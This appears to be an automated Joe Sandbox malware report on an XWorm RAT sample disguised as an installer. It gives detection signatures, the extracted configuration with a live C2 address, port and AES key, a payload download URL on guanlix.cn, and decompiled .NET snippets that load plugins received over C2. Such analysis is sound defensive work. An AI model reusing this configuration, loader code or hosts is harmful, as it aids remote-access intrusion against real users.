Edit tour

Windows Analysis Report
31-o_Installer.exe

Overview

General Information

Sample name:	31-o_Installer.exe
Analysis ID:	1466307
MD5:	5913d1b0d2fa0204e9e063467d000c3a
SHA1:	50b4b4929edb21c17c49c40ac2a4050bd8f93768
SHA256:	3192aea6cf0c450948b2006ca0ef28dcaf06aa4c9730ef8dc8199975064cdf72
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

31-o_Installer.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\31-o_Installer.exe" MD5: 5913D1B0D2FA0204E9E063467D000C3A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x12155:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Downloads\ind.cod	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 31-o_Installer.exe PID: 6672	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.31-o_Installer.exe.5320000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.31-o_Installer.exe.5320000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
0.2.31-o_Installer.exe.5320000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.31-o_Installer.exe.5320000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cf2:$cnc4: POST / HTTP/1.1

Snort Signatures

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.6 - Destination IP: 156.238.235.31

Timestamp:	07/02/24-19:21:18.807141
SID:	2855924
Source Port:	49712
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 156.238.235.31 - Destination IP: 192.168.2.6

Timestamp:	07/02/24-19:25:04.354852
SID:	2852870
Source Port:	7000
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 156.238.235.31 - Destination IP: 192.168.2.6

Timestamp:	07/02/24-19:24:55.688649
SID:	2852874
Source Port:	7000
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.6 - Destination IP: 156.238.235.31

Timestamp:	07/02/24-19:25:04.355848
SID:	2852923
Source Port:	49712
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.6 - Destination IP: 156.238.235.31

Timestamp:	07/02/24-19:22:57.227073
SID:	2853193
Source Port:	49712
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://guanlix.cn:881/31.ccp

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 31-o_Installer.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 31-o_Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack	String decryptor: 156.238.235.31
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack	String decryptor: 7000
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack	String decryptor: USB.exe

Source: 31-o_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 31-o_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49712 -> 156.238.235.31:7000
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 156.238.235.31:7000 -> 192.168.2.6:49712
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.6:49712 -> 156.238.235.31:7000
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 156.238.235.31:7000 -> 192.168.2.6:49712
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49712 -> 156.238.235.31:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 156.238.235.31

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49710

Source: global traffic	TCP traffic: 192.168.2.6:49710 -> 91.208.240.157:881
Source: global traffic	TCP traffic: 192.168.2.6:49712 -> 156.238.235.31:7000

Source: Joe Sandbox View

ASN Name: XHOSTSERVERUS XHOSTSERVERUS

Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: 0_2_002625C8 __EH_prolog,InternetReadFile,

0_2_002625C8

Source: global traffic

HTTP traffic detected: GET /31.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: guanlix.cn

Source: 31-o_Installer.exe	String found in binary or memory: http://guanlix.cn:881/31.ccp
Source: 31-o_Installer.exe, 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\31-o_Installer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0027007E	0_2_0027007E
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_00275A2A	0_2_00275A2A
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0027738F	0_2_0027738F
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0026FBE9	0_2_0026FBE9
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_00270BD6	0_2_00270BD6
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0027041C	0_2_0027041C
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_002754D9	0_2_002754D9
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_00276657	0_2_00276657
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_00275F7B	0_2_00275F7B
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_00277F4F	0_2_00277F4F
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_002707EE	0_2_002707EE
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0533A418	0_2_0533A418
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_05337CB0	0_2_05337CB0
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_05334E68	0_2_05334E68
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0533EE5A	0_2_0533EE5A
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_05335B40	0_2_05335B40
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_053307A0	0_2_053307A0
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_05334B20	0_2_05334B20

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: String function: 0026A9B0 appears 45 times

Source: 31-o_Installer.exe, 00000000.00000000.2097104233.0000000000283000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewindos.exe. vs 31-o_Installer.exe
Source: 31-o_Installer.exe, 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 31-o_Installer.exe
Source: 31-o_Installer.exe	Binary or memory string: OriginalFilenamewindos.exe. vs 31-o_Installer.exe

Source: 31-o_Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\Public\Downloads\ind.cod, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@1/2

Source: C:\Users\user\Desktop\31-o_Installer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp

Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\31-o_Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\DMTpmF9DC6Wmoh6u

Source: 31-o_Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\31-o_Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 31-o_Installer.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: 31-o_Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 31-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 31-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 31-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 31-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 31-o_Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: 0_2_002740E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_002740E4

Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_00264948 push eax; ret	0_2_00264966
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0026A9F5 push ecx; ret	0_2_0026AA08
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_00266649 push ecx; ret	0_2_0026665C

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49710

Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
